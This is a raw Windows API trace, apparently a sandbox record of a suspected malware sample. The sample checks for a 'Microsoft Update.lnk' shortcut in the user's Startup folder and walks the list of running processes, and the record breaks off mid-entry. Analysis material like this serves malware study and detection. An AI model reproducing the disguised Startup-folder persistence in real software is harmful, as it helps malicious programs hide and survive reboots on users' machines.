1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0292.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0292.715] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0292.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0292.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0292.715] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0292.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0292.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0292.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0292.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0292.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0292.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0292.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0292.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0292.717] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0292.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0292.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0292.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0292.718] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0292.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0292.718] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0292.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0292.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0292.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0292.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0292.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0292.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0292.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0292.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0292.719] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0292.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0292.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0292.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0292.720] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0292.720] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0292.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0292.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0292.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0292.720] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0292.722] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.722] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.723] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.724] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.724] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.725] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.725] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.726] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.727] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.727] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0292.728] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.728] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.729] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.730] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.730] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.731] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.731] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.732] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.733] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.733] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.734] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.735] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0292.735] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.736] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0292.736] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0292.737] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0292.738] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0292.738] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0292.739] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0292.739] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0292.740] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0292.741] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0292.741] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0292.742] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0292.742] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0292.743] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0292.744] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0292.744] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0292.745] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, 